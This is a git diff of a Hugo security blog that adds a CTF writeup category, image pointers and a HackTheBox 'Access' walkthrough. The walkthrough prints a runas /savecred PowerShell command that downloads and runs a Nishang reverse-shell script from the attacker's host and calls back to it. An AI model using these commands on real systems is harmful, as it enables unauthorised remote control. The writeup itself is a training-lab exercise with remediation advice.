content/writeup-ctf/writeup-watcher-thm/img/image-12.png create mode 100644 content/writeup-ctf/writeup-watcher-thm/img/image-12.webp create mode 100644 content/writeup-ctf/writeup-watcher-thm/img/image-2.png create mode 100644 content/writeup-ctf/writeup-watcher-thm/img/image-2.webp create mode 100644 content/writeup-ctf/writeup-watcher-thm/img/image-3.png create mode 100644 content/writeup-ctf/writeup-watcher-thm/img/image-3.webp create mode 100644 content/writeup-ctf/writeup-watcher-thm/img/image-4.png create mode 100644 content/writeup-ctf/writeup-watcher-thm/img/image-4.webp create mode 100644 content/writeup-ctf/writeup-watcher-thm/img/image-5.png create mode 100644 content/writeup-ctf/writeup-watcher-thm/img/image-5.webp create mode 100644 content/writeup-ctf/writeup-watcher-thm/img/image-6.png create mode 100644 content/writeup-ctf/writeup-watcher-thm/img/image-6.webp create mode 100644 content/writeup-ctf/writeup-watcher-thm/img/image-7.png create mode 100644 content/writeup-ctf/writeup-watcher-thm/img/image-7.webp create mode 100644 content/writeup-ctf/writeup-watcher-thm/img/image-8.png create mode 100644 content/writeup-ctf/writeup-watcher-thm/img/image-8.webp create mode 100644 content/writeup-ctf/writeup-watcher-thm/img/image-9.png create mode 100644 content/writeup-ctf/writeup-watcher-thm/img/image-9.webp create mode 100644 content/writeup-ctf/writeup-watcher-thm/index.md create mode 100644 content/writeup-ctf/writeup-wekor-thm/featured.png create mode 100644 content/writeup-ctf/writeup-wekor-thm/featured.webp create mode 100644 content/writeup-ctf/writeup-wekor-thm/img/image-1.png create mode 100644 content/writeup-ctf/writeup-wekor-thm/img/image-1.webp create mode 100644 content/writeup-ctf/writeup-wekor-thm/img/image-10.png create mode 100644 content/writeup-ctf/writeup-wekor-thm/img/image-10.webp create mode 100644 content/writeup-ctf/writeup-wekor-thm/img/image-11.png create mode 100644 content/writeup-ctf/writeup-wekor-thm/img/image-11.webp 
create mode 100644 content/writeup-ctf/writeup-wekor-thm/img/image-12.png create mode 100644 content/writeup-ctf/writeup-wekor-thm/img/image-12.webp create mode 100644 content/writeup-ctf/writeup-wekor-thm/img/image-2.png create mode 100644 content/writeup-ctf/writeup-wekor-thm/img/image-2.webp create mode 100644 content/writeup-ctf/writeup-wekor-thm/img/image-3.png create mode 100644 content/writeup-ctf/writeup-wekor-thm/img/image-3.webp create mode 100644 content/writeup-ctf/writeup-wekor-thm/img/image-4.png create mode 100644 content/writeup-ctf/writeup-wekor-thm/img/image-4.webp create mode 100644 content/writeup-ctf/writeup-wekor-thm/img/image-5.png create mode 100644 content/writeup-ctf/writeup-wekor-thm/img/image-5.webp create mode 100644 content/writeup-ctf/writeup-wekor-thm/img/image-6.png create mode 100644 content/writeup-ctf/writeup-wekor-thm/img/image-6.webp create mode 100644 content/writeup-ctf/writeup-wekor-thm/img/image-7.png create mode 100644 content/writeup-ctf/writeup-wekor-thm/img/image-7.webp create mode 100644 content/writeup-ctf/writeup-wekor-thm/img/image-8.png create mode 100644 content/writeup-ctf/writeup-wekor-thm/img/image-8.webp create mode 100644 content/writeup-ctf/writeup-wekor-thm/img/image-9.png create mode 100644 content/writeup-ctf/writeup-wekor-thm/img/image-9.webp create mode 100644 content/writeup-ctf/writeup-wekor-thm/index.md create mode 100644 content/writeup-ctf/writeup-wonderland-thm/img/image-1.png create mode 100644 content/writeup-ctf/writeup-wonderland-thm/img/image-1.webp create mode 100644 content/writeup-ctf/writeup-wonderland-thm/img/image-10.png create mode 100644 content/writeup-ctf/writeup-wonderland-thm/img/image-10.webp create mode 100644 content/writeup-ctf/writeup-wonderland-thm/img/image-11.png create mode 100644 content/writeup-ctf/writeup-wonderland-thm/img/image-11.webp create mode 100644 content/writeup-ctf/writeup-wonderland-thm/img/image-12.png create mode 100644 
content/writeup-ctf/writeup-wonderland-thm/img/image-12.webp create mode 100644 content/writeup-ctf/writeup-wonderland-thm/img/image-13.png create mode 100644 content/writeup-ctf/writeup-wonderland-thm/img/image-13.webp create mode 100644 content/writeup-ctf/writeup-wonderland-thm/img/image-2.png create mode 100644 content/writeup-ctf/writeup-wonderland-thm/img/image-2.webp create mode 100644 content/writeup-ctf/writeup-wonderland-thm/img/image-3.png create mode 100644 content/writeup-ctf/writeup-wonderland-thm/img/image-3.webp create mode 100644 content/writeup-ctf/writeup-wonderland-thm/img/image-4.png create mode 100644 content/writeup-ctf/writeup-wonderland-thm/img/image-4.webp create mode 100644 content/writeup-ctf/writeup-wonderland-thm/img/image-5.png create mode 100644 content/writeup-ctf/writeup-wonderland-thm/img/image-5.webp create mode 100644 content/writeup-ctf/writeup-wonderland-thm/img/image-6.png create mode 100644 content/writeup-ctf/writeup-wonderland-thm/img/image-6.webp create mode 100644 content/writeup-ctf/writeup-wonderland-thm/img/image-7.png create mode 100644 content/writeup-ctf/writeup-wonderland-thm/img/image-7.webp create mode 100644 content/writeup-ctf/writeup-wonderland-thm/img/image-8.png create mode 100644 content/writeup-ctf/writeup-wonderland-thm/img/image-8.webp create mode 100644 content/writeup-ctf/writeup-wonderland-thm/img/image-9.png create mode 100644 content/writeup-ctf/writeup-wonderland-thm/img/image-9.webp create mode 100644 content/writeup-ctf/writeup-wonderland-thm/index.md diff --git a/.gitignore b/.gitignore index 1f3b413..f732d45 100644 --- a/.gitignore +++ b/.gitignore @@ -5,3 +5,4 @@ public #others node_modules .hugo_build.lock +*.lock diff --git a/config/_default/menus.en.toml b/config/_default/menus.en.toml index df4969b..77fe59f 100644 --- a/config/_default/menus.en.toml +++ b/config/_default/menus.en.toml 
@@ -43,6 +43,12 @@ pageRef = "categories/security" weight = 10 +[[main]] + name = "Writeup CTF" + parent = "Categories" + pageRef = "categories/writeup-ctf" + weight = 10 + [[main]] name = "About" pageRef = "about" diff --git a/content/categories/_index.md b/content/categories/_index.md index 7910cf4..ad57e8a 100644 --- a/content/categories/_index.md +++ b/content/categories/_index.md @@ -31,3 +31,13 @@ layout: "categories" + +--- + +{{< list title="Writeup CTF" cardView=true limit=3 where="Type" value="writeup-ctf" >}} + +
+ + + +
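Review bot: the `+*.lock` line added at the end of `.gitignore` is broader than this change needs. `.hugo_build.lock` is already listed on the context line directly above it, and a blanket `*.lock` glob would also hide dependency lock files such as `yarn.lock` if the site ever gains one, which makes builds harder to reproduce and audit. The rename further down in this patch (`rename from .hugo_build.lock`) shows the lock file was tracked despite that existing ignore entry, so the tracked copy is the thing to fix; I would drop the `*.lock` line and keep the specific entry.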
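Review bot: the new `[[main]]` entry in `config/_default/menus.en.toml` is given `weight = 10`, the same value as the `pageRef = "categories/security"` entry shown in the context lines just above it. With equal weights the relative order of the two menu items is left to Hugo's tie-break instead of being stated in the config. Give the "Writeup CTF" entry its own weight so the intended position is explicit.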
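Review bot: the `where="Type" value="writeup-ctf"` filter in the shortcode added to `content/categories/_index.md` depends on something this patch never states. The section's `content/writeup-ctf/_index.md` arrives as a `similarity index 100%` rename of `.hugo_build.lock`, so it brings no front matter of its own, and the pages only match because Hugo derives a page's type from its top-level section directory name. The same string is repeated in the menu `pageRef` and in `content/categories/writeup-ctf.md`, so renaming the directory would empty both lists without any build error. I would give the section `_index.md` real front matter (at least a `title`) and note the dependency there.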
diff --git a/content/categories/writeup-ctf.md b/content/categories/writeup-ctf.md new file mode 100644 index 0000000..bc763b6 --- /dev/null +++ b/content/categories/writeup-ctf.md @@ -0,0 +1,11 @@ +--- +title: "Writeup CTF" +draft: false +slug: "writeup-ctf" +layout: "simple" +showWordCount: false +showReadingTime: false +showDate: false +--- + +{{< list title=" " cardView=true limit=99 where="Type" value="writeup-ctf" >}} diff --git a/.hugo_build.lock b/content/writeup-ctf/_index.md similarity index 100% rename from .hugo_build.lock rename to content/writeup-ctf/_index.md diff --git a/content/writeup-ctf/writeup-access-htb/featured.png b/content/writeup-ctf/writeup-access-htb/featured.png new file mode 100644 index 0000000..f357634 --- /dev/null +++ b/content/writeup-ctf/writeup-access-htb/featured.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:5b51df0e74336e5565534f4cb09a01b7e66fab1393aa076f240a1c26308e8a71 +size 247562 diff --git a/content/writeup-ctf/writeup-access-htb/featured.webp b/content/writeup-ctf/writeup-access-htb/featured.webp new file mode 100644 index 0000000..58602ac --- /dev/null +++ b/content/writeup-ctf/writeup-access-htb/featured.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:e51314a57cc1b2df2b39cc19dae575f2fce27457701787afeadf634d91407378 +size 30548 diff --git a/content/writeup-ctf/writeup-access-htb/img/image-1.png b/content/writeup-ctf/writeup-access-htb/img/image-1.png new file mode 100644 index 0000000..a1a73ac --- /dev/null +++ b/content/writeup-ctf/writeup-access-htb/img/image-1.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:debd125b04ed35e60c06dd78d7630f1aec22bef25652c92f82aecd97659b7722 +size 38732 diff --git a/content/writeup-ctf/writeup-access-htb/img/image-1.webp b/content/writeup-ctf/writeup-access-htb/img/image-1.webp new file mode 100644 index 0000000..df35602 --- /dev/null +++ b/content/writeup-ctf/writeup-access-htb/img/image-1.webp 
@@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:ebe715c52e304a8dcac1d4b9f4bcf785d41cab4d8df6901e8a9377d4440655ee +size 35930 diff --git a/content/writeup-ctf/writeup-access-htb/img/image-10.png b/content/writeup-ctf/writeup-access-htb/img/image-10.png new file mode 100644 index 0000000..cab7f60 --- /dev/null +++ b/content/writeup-ctf/writeup-access-htb/img/image-10.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:6c61f9dc89032c76846256296e2279006dd537e24d59bbf6b93c4603bde6a6dd +size 17164 diff --git a/content/writeup-ctf/writeup-access-htb/img/image-10.webp b/content/writeup-ctf/writeup-access-htb/img/image-10.webp new file mode 100644 index 0000000..66e75bb --- /dev/null +++ b/content/writeup-ctf/writeup-access-htb/img/image-10.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:4829ef64164981667f357a2387226ce8268be76ec0f1578b7a397de3eaeb403a +size 18342 diff --git a/content/writeup-ctf/writeup-access-htb/img/image-11.png b/content/writeup-ctf/writeup-access-htb/img/image-11.png new file mode 100644 index 0000000..cb2e30c --- /dev/null +++ b/content/writeup-ctf/writeup-access-htb/img/image-11.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:f44ac88ab92bbc81b71ab5fa812d965edc57efcd59ba7544bc9d6a0f2e9b2fc0 +size 5277 diff --git a/content/writeup-ctf/writeup-access-htb/img/image-11.webp b/content/writeup-ctf/writeup-access-htb/img/image-11.webp new file mode 100644 index 0000000..fc82e7e --- /dev/null +++ b/content/writeup-ctf/writeup-access-htb/img/image-11.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:6e548dd1560d08288bd8daf02234ea335232ed618645bd38f7ab783a010b40e7 +size 5252 diff --git a/content/writeup-ctf/writeup-access-htb/img/image-2.png b/content/writeup-ctf/writeup-access-htb/img/image-2.png new file mode 100644 index 0000000..612248f --- /dev/null +++ b/content/writeup-ctf/writeup-access-htb/img/image-2.png 
@@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:0804195d00fc869748ad92d0ba0c552ebd2f4cf2a8721c3a3e0fe71c5ee7868d +size 377385 diff --git a/content/writeup-ctf/writeup-access-htb/img/image-2.webp b/content/writeup-ctf/writeup-access-htb/img/image-2.webp new file mode 100644 index 0000000..27401b3 --- /dev/null +++ b/content/writeup-ctf/writeup-access-htb/img/image-2.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:d8a96cc47dce9a9118c06d05a82559cc056c77b26e98285f3330332bf5af0591 +size 59020 diff --git a/content/writeup-ctf/writeup-access-htb/img/image-3.png b/content/writeup-ctf/writeup-access-htb/img/image-3.png new file mode 100644 index 0000000..ba95bd1 --- /dev/null +++ b/content/writeup-ctf/writeup-access-htb/img/image-3.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:ccf5d2816c21e4a891409e4daf2e06700eedfa5e372799d038c22958e9a20a02 +size 25572 diff --git a/content/writeup-ctf/writeup-access-htb/img/image-3.webp b/content/writeup-ctf/writeup-access-htb/img/image-3.webp new file mode 100644 index 0000000..4aca2da --- /dev/null +++ b/content/writeup-ctf/writeup-access-htb/img/image-3.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:02aa87385edcf6cb51e4d88b0566d1658817b74dd58e0e4e2a51cab530358e20 +size 25282 diff --git a/content/writeup-ctf/writeup-access-htb/img/image-4.png b/content/writeup-ctf/writeup-access-htb/img/image-4.png new file mode 100644 index 0000000..869b74b --- /dev/null +++ b/content/writeup-ctf/writeup-access-htb/img/image-4.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:26c092c06babcaeab06d21a509ffe556487b27101343eb2e7551895136285b5c +size 68897 diff --git a/content/writeup-ctf/writeup-access-htb/img/image-4.webp b/content/writeup-ctf/writeup-access-htb/img/image-4.webp new file mode 100644 index 0000000..ea3b105 --- /dev/null +++ b/content/writeup-ctf/writeup-access-htb/img/image-4.webp 
@@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:810ad324f9d6afe8f6ec34e0504eb4f2fc7fcce15a86675d49a0ba3c2d80f504 +size 100110 diff --git a/content/writeup-ctf/writeup-access-htb/img/image-5.png b/content/writeup-ctf/writeup-access-htb/img/image-5.png new file mode 100644 index 0000000..f5c9c9e --- /dev/null +++ b/content/writeup-ctf/writeup-access-htb/img/image-5.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:4e671142081762c8d6c7d9d4fd403daccfe70fd2075a50abdf3c39f15a55f84b +size 13166 diff --git a/content/writeup-ctf/writeup-access-htb/img/image-5.webp b/content/writeup-ctf/writeup-access-htb/img/image-5.webp new file mode 100644 index 0000000..1b388ae --- /dev/null +++ b/content/writeup-ctf/writeup-access-htb/img/image-5.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:614af298ab2c72b25799719c378770f22de1c57306857b00b6381709acb13be2 +size 15444 diff --git a/content/writeup-ctf/writeup-access-htb/img/image-6.png b/content/writeup-ctf/writeup-access-htb/img/image-6.png new file mode 100644 index 0000000..3afd3f7 --- /dev/null +++ b/content/writeup-ctf/writeup-access-htb/img/image-6.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:007aebee2e19da280e53cee5f5c4a2a97e304a624be1a4635812ae863c243da8 +size 10675 diff --git a/content/writeup-ctf/writeup-access-htb/img/image-6.webp b/content/writeup-ctf/writeup-access-htb/img/image-6.webp new file mode 100644 index 0000000..8a71ba2 --- /dev/null +++ b/content/writeup-ctf/writeup-access-htb/img/image-6.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:7f256a1812e2f8fa19e305d83a2be726e5fda9c68a915435ad559148fbf25b4d +size 9252 diff --git a/content/writeup-ctf/writeup-access-htb/img/image-7.png b/content/writeup-ctf/writeup-access-htb/img/image-7.png new file mode 100644 index 0000000..f1f6221 --- /dev/null +++ b/content/writeup-ctf/writeup-access-htb/img/image-7.png 
@@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:05dc75d287304dd5231cf4b34d228376e220db4b54c0104adeb8a6b3425553c6 +size 16649 diff --git a/content/writeup-ctf/writeup-access-htb/img/image-7.webp b/content/writeup-ctf/writeup-access-htb/img/image-7.webp new file mode 100644 index 0000000..bc3ffb8 --- /dev/null +++ b/content/writeup-ctf/writeup-access-htb/img/image-7.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:eab5e708f6931019b8f9212d9904bd7fbb16eb137c59bedb6a70644ff0a025e0 +size 12734 diff --git a/content/writeup-ctf/writeup-access-htb/img/image-8.png b/content/writeup-ctf/writeup-access-htb/img/image-8.png new file mode 100644 index 0000000..6a67eb1 --- /dev/null +++ b/content/writeup-ctf/writeup-access-htb/img/image-8.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:e9f1719ccc9f92de8ddb8b190d947a5457399b2b9481ace74bb6bb5ef00096ee +size 7162 diff --git a/content/writeup-ctf/writeup-access-htb/img/image-8.webp b/content/writeup-ctf/writeup-access-htb/img/image-8.webp new file mode 100644 index 0000000..5bda8f1 --- /dev/null +++ b/content/writeup-ctf/writeup-access-htb/img/image-8.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:6290839b3432d304944df635a6954d7142d101839bdf1ee507d101574cbf4d4b +size 7402 diff --git a/content/writeup-ctf/writeup-access-htb/img/image-9.png b/content/writeup-ctf/writeup-access-htb/img/image-9.png new file mode 100644 index 0000000..d7d26c7 --- /dev/null +++ b/content/writeup-ctf/writeup-access-htb/img/image-9.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:b5a21c43937a6427d140691c5bfa6eec85e7498fc4affb4c7309341387622720 +size 56522 diff --git a/content/writeup-ctf/writeup-access-htb/img/image-9.webp b/content/writeup-ctf/writeup-access-htb/img/image-9.webp new file mode 100644 index 0000000..a6c967b --- /dev/null +++ b/content/writeup-ctf/writeup-access-htb/img/image-9.webp 
@@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:2bf179778bf508d3a49767378dc448fa801fcac6697e710899e812c41e12b4cc +size 53026 diff --git a/content/writeup-ctf/writeup-access-htb/index.md b/content/writeup-ctf/writeup-access-htb/index.md new file mode 100644 index 0000000..81a91df --- /dev/null +++ b/content/writeup-ctf/writeup-access-htb/index.md 
@@ -0,0 +1,106 @@ +--- +title: "Writeup - Access (HTB)" +date: 2022-04-15 +slug: "writeup-access-htb" +type: "writeup-ctf" +--- + +This is a writeup for the [Access](https://app.hackthebox.com/machines/Access) machine from the HackTheBox site. + +## Enumeration + +First, let's start with a scan of our target with the following command: + + +```bash +nmap -sV -T4 -Pn 10.10.10.98 +``` +Three TCP ports are discovered: + +![](img/image-1.webp) + +- 21/tcp : FTP +- 23/tcp : telnet +- 80/tcp : HTTP web server (httpd 7.5) + +![](img/image-2.webp) + +## Exploit + +In the `nmap` scan we find an FTP server, let's try to connect as `anonymous`. + +![](img/image-3.webp) + +There are 2 folders in which we find the following files: +- Access Control.zip +- backup.mdb + +{{< alert >}} +Before downloading the backup file with the command `get backup.mdb` you should use the command `binary`To read the contents of the backup file I use the command `mdb-tables`: +{{< /alert >}} + +![](img/image-4.webp) + +In the different tables I find `auth_user`, interesting there could be credencial for an account. + +![](img/image-5.webp) + +I find an `engineer` account with the password `access4u@security`. I use this password to try to decompress the previously recovered archive. + +In the archive I find a `.pst`. To read its contents I use the following command: + + +```bash +readpst Access\ Control.pst -M +``` +Among the different mails I find the following content: + +![](img/image-6.webp) + +A new password ! I try to connect to the telnet server with these credencials. + +![](img/image-7.webp) + +I now have a shell as `security` and I can get the first flag. + +![](img/image-8.webp) + +## Privilege escalation + +After a few minutes of exploration, I find a file on the Desktop of the `Public` user. In this file I find an interesting command! A runas with the user `Administrator`. 
+ +![](img/image-9.webp) + +I will use this [script](https://github.com/samratashok/nishang/blob/master/Shells/Invoke-PowerShellTcp.ps1) to create a reverse shell Admin. So I get this file and I add the following line at the end of the file. + + +```bash +Invoke-PowerShellTcp -Reverse -IPAddress 10.10.14.17 -Port 1234 +``` +I then launch a web server on my machine. + + +```bash +python3 -m http.server 80 +``` +Then I download/run the script with the admin runas. + + +```bash +runas /user:ACCESS\Administrator /savecred "powershell iex(new-object net.webclient).downloadstring('http://10.10.14.17/Invoke-PowerShellTcp.ps1')" +``` +I now have a reverse shell as Administrator! + +![](img/image-10.webp) + +So I can get the last flag back. + +![](img/image-11.webp) + +## Recommendations + +To patch this host I think it would be necessary to perform a number of actions: + +- Do not let the `anonymous` user enable in FTP server configuration +- Do not store sensitive information in a folder accessible by several people via FTP/web/... +- Do not give runas Administrator permission to a user diff --git a/content/writeup-ctf/writeup-active-htb/featured.png b/content/writeup-ctf/writeup-active-htb/featured.png new file mode 100644 index 0000000..103653a --- /dev/null +++ b/content/writeup-ctf/writeup-active-htb/featured.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:e0cbb76004b293bd70752a004680c6ad0b7f0a6ead1356f5f20510c2622e742c +size 302934 diff --git a/content/writeup-ctf/writeup-active-htb/featured.webp b/content/writeup-ctf/writeup-active-htb/featured.webp new file mode 100644 index 0000000..0f13bf2 --- /dev/null +++ b/content/writeup-ctf/writeup-active-htb/featured.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:04560bd69275995fb2b53116d4b64028c95c01a36e63a06eb62e8abc4b50990c +size 31792 
diff --git a/content/writeup-ctf/writeup-active-htb/img/image-1.png b/content/writeup-ctf/writeup-active-htb/img/image-1.png new file mode 100644 index 0000000..6d02db4 --- /dev/null +++ b/content/writeup-ctf/writeup-active-htb/img/image-1.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:e89ecf0e35f94b8477bcec0a9473cbf7e6909e5df20e4a717447c205e960acbd +size 110133 diff --git a/content/writeup-ctf/writeup-active-htb/img/image-1.webp b/content/writeup-ctf/writeup-active-htb/img/image-1.webp new file mode 100644 index 0000000..8b9cf4f --- /dev/null +++ b/content/writeup-ctf/writeup-active-htb/img/image-1.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:03ae2848a225e04d693c0966511102667618e20ff12c37aa1eeba6aad67d2c3e +size 90268 diff --git a/content/writeup-ctf/writeup-active-htb/img/image-10.png b/content/writeup-ctf/writeup-active-htb/img/image-10.png new file mode 100644 index 0000000..7430b8c --- /dev/null +++ b/content/writeup-ctf/writeup-active-htb/img/image-10.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:debd00a4d86e7aed855ec5197c5ac4d5cd095aa1b602527dee9ca1f0549a50e2 +size 32212 diff --git a/content/writeup-ctf/writeup-active-htb/img/image-10.webp b/content/writeup-ctf/writeup-active-htb/img/image-10.webp new file mode 100644 index 0000000..50559ef --- /dev/null +++ b/content/writeup-ctf/writeup-active-htb/img/image-10.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:867d895f45b2781000b707ad2b553e2c2104916a792cab4fc4d01c0913be8f61 +size 26372 diff --git a/content/writeup-ctf/writeup-active-htb/img/image-11.png b/content/writeup-ctf/writeup-active-htb/img/image-11.png new file mode 100644 index 0000000..63d08ab --- /dev/null +++ b/content/writeup-ctf/writeup-active-htb/img/image-11.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:9e78375848cad70aed8eb3d51f2ff94a7dd0964c3cf515fd1eb9df330bf42762 +size 31976 
diff --git a/content/writeup-ctf/writeup-active-htb/img/image-11.webp b/content/writeup-ctf/writeup-active-htb/img/image-11.webp new file mode 100644 index 0000000..c1e5b5b --- /dev/null +++ b/content/writeup-ctf/writeup-active-htb/img/image-11.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:8f475a9c2a387db7e17dc532efb63a91469d648332d746bdb264caab55f5058d +size 32492 diff --git a/content/writeup-ctf/writeup-active-htb/img/image-2.png b/content/writeup-ctf/writeup-active-htb/img/image-2.png new file mode 100644 index 0000000..ed3856f --- /dev/null +++ b/content/writeup-ctf/writeup-active-htb/img/image-2.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:5ddc575a4f059a87a3c806b4525753b6f1341ea0ee2b577ee7af8dfaa7586c04 +size 57144 diff --git a/content/writeup-ctf/writeup-active-htb/img/image-2.webp b/content/writeup-ctf/writeup-active-htb/img/image-2.webp new file mode 100644 index 0000000..c6e4040 --- /dev/null +++ b/content/writeup-ctf/writeup-active-htb/img/image-2.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:e7cde51fc6e464a3c81324a533e039b491512faa0deeb59bc606bb306823430c +size 52190 diff --git a/content/writeup-ctf/writeup-active-htb/img/image-3.png b/content/writeup-ctf/writeup-active-htb/img/image-3.png new file mode 100644 index 0000000..e2e4957 --- /dev/null +++ b/content/writeup-ctf/writeup-active-htb/img/image-3.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:5e028a0655bded3892d83de48205f57b721bea3a70e82854f3d4d3abc29d1d21 +size 14429 diff --git a/content/writeup-ctf/writeup-active-htb/img/image-3.webp b/content/writeup-ctf/writeup-active-htb/img/image-3.webp new file mode 100644 index 0000000..aaafca7 --- /dev/null +++ b/content/writeup-ctf/writeup-active-htb/img/image-3.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:7af2fcc27f11cced46af087fd8ddcc9f5f3012963edc2ce9591ef994836f55b2 +size 11832 
diff --git a/content/writeup-ctf/writeup-active-htb/img/image-4.png b/content/writeup-ctf/writeup-active-htb/img/image-4.png new file mode 100644 index 0000000..0da7e5d --- /dev/null +++ b/content/writeup-ctf/writeup-active-htb/img/image-4.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:ebc6d051c63e6289a353cd1a780c6ba93cc3bbf073566c744799f96570e9c8c0 +size 13174 diff --git a/content/writeup-ctf/writeup-active-htb/img/image-4.webp b/content/writeup-ctf/writeup-active-htb/img/image-4.webp new file mode 100644 index 0000000..27fa8ac --- /dev/null +++ b/content/writeup-ctf/writeup-active-htb/img/image-4.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:3651bf6062c36cbbf5e932918cf75f1618e88422572571e03be7721beaf0b968 +size 10568 diff --git a/content/writeup-ctf/writeup-active-htb/img/image-5.png b/content/writeup-ctf/writeup-active-htb/img/image-5.png new file mode 100644 index 0000000..b73df9f --- /dev/null +++ b/content/writeup-ctf/writeup-active-htb/img/image-5.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:c71356151756244db50e209eddd9bebfb9526d1c84699e988de42e4c5ed7e44b +size 26736 diff --git a/content/writeup-ctf/writeup-active-htb/img/image-5.webp b/content/writeup-ctf/writeup-active-htb/img/image-5.webp new file mode 100644 index 0000000..8ead44d --- /dev/null +++ b/content/writeup-ctf/writeup-active-htb/img/image-5.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:c04ac12d5df81241ed984be1c77524e1380cdc42427aaa55ad449645bee703f6 +size 19780 diff --git a/content/writeup-ctf/writeup-active-htb/img/image-6.png b/content/writeup-ctf/writeup-active-htb/img/image-6.png new file mode 100644 index 0000000..746471d --- /dev/null +++ b/content/writeup-ctf/writeup-active-htb/img/image-6.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:64e69d253c2ef12ab3dc3ebe9c94f7d1d2ff96dcd7fbc923d4d5b269ea76fd61 +size 27359 
diff --git a/content/writeup-ctf/writeup-active-htb/img/image-6.webp b/content/writeup-ctf/writeup-active-htb/img/image-6.webp new file mode 100644 index 0000000..9b6f8ed --- /dev/null +++ b/content/writeup-ctf/writeup-active-htb/img/image-6.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:e5b3fac547fae1c21afe52cade08ef1597104e365a8c9d78cbf06420b1e35c48 +size 32272 diff --git a/content/writeup-ctf/writeup-active-htb/img/image-7.png b/content/writeup-ctf/writeup-active-htb/img/image-7.png new file mode 100644 index 0000000..47cc76c --- /dev/null +++ b/content/writeup-ctf/writeup-active-htb/img/image-7.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:481728e4736e177e67e7adc5569bc132af89db7a642b119b12436b36d40a3a4e +size 10933 diff --git a/content/writeup-ctf/writeup-active-htb/img/image-7.webp b/content/writeup-ctf/writeup-active-htb/img/image-7.webp new file mode 100644 index 0000000..0884b71 --- /dev/null +++ b/content/writeup-ctf/writeup-active-htb/img/image-7.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:5a654908123a53f6216e0b2e3272743e75cb90514cfff2e1e4a892f803b16a41 +size 10790 diff --git a/content/writeup-ctf/writeup-active-htb/img/image-8.png b/content/writeup-ctf/writeup-active-htb/img/image-8.png new file mode 100644 index 0000000..db56dd6 --- /dev/null +++ b/content/writeup-ctf/writeup-active-htb/img/image-8.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:4ae6b099111a7b77f5c364c12744bb5a5786e622388bc8b557b076e49ba199b1 +size 26543 diff --git a/content/writeup-ctf/writeup-active-htb/img/image-8.webp b/content/writeup-ctf/writeup-active-htb/img/image-8.webp new file mode 100644 index 0000000..0b73ddb --- /dev/null +++ b/content/writeup-ctf/writeup-active-htb/img/image-8.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:1ed6c9aa4d2014d0244b7070f1b5fc41d7908482418d4553463e2fb09194335e +size 25120 
